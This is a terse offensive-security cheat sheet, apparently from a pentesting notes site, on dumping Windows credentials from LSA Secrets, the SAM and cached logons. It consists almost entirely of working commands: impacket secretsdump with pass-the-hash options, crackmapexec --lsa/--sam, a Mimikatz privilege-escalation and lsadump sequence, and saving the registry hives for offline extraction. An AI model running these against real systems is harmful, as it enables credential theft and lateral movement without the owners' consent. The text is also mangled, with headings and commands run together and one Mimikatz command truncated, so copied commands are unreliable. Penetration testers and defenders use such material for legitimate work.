Registry Credentials
LSA Secrets
SAM
Dumping Registry Credentials
Last updated
Last updated
secretsdump.py <domain/>[username]<:password><@computer> <options>
OPTIONS
-outputfile Base Output Filename
-hashes Authenticate Using LMHASH:NTHASH
-k Use Kerberos Auth From ccache Filecrackmapexec smb -u [username] -p [password] --lsa
crackmapexec smb -u [username] -p [password] --sam## Run Mimikatz
mimikatz.exe
## Acquire A System Session
token::elevate
## Enable SeDebugPrivilege In Your Terminal
privilege::debug
## Get LSA, Cache, Or SAM (Respectively)
lsadump::secrets
lsadump::cache
lsadump::sa## Save Required Hive Files
reg save HKLM\SYSTEM system.bin
reg save HKLM\SECURITY security.bin
reg save HKLM\SAM sam.bin# Use impacket-secretsdump To Parse Hive Files
impacket-secretsdump -system system.bin -security security.bin -sam sam.bin LOCAL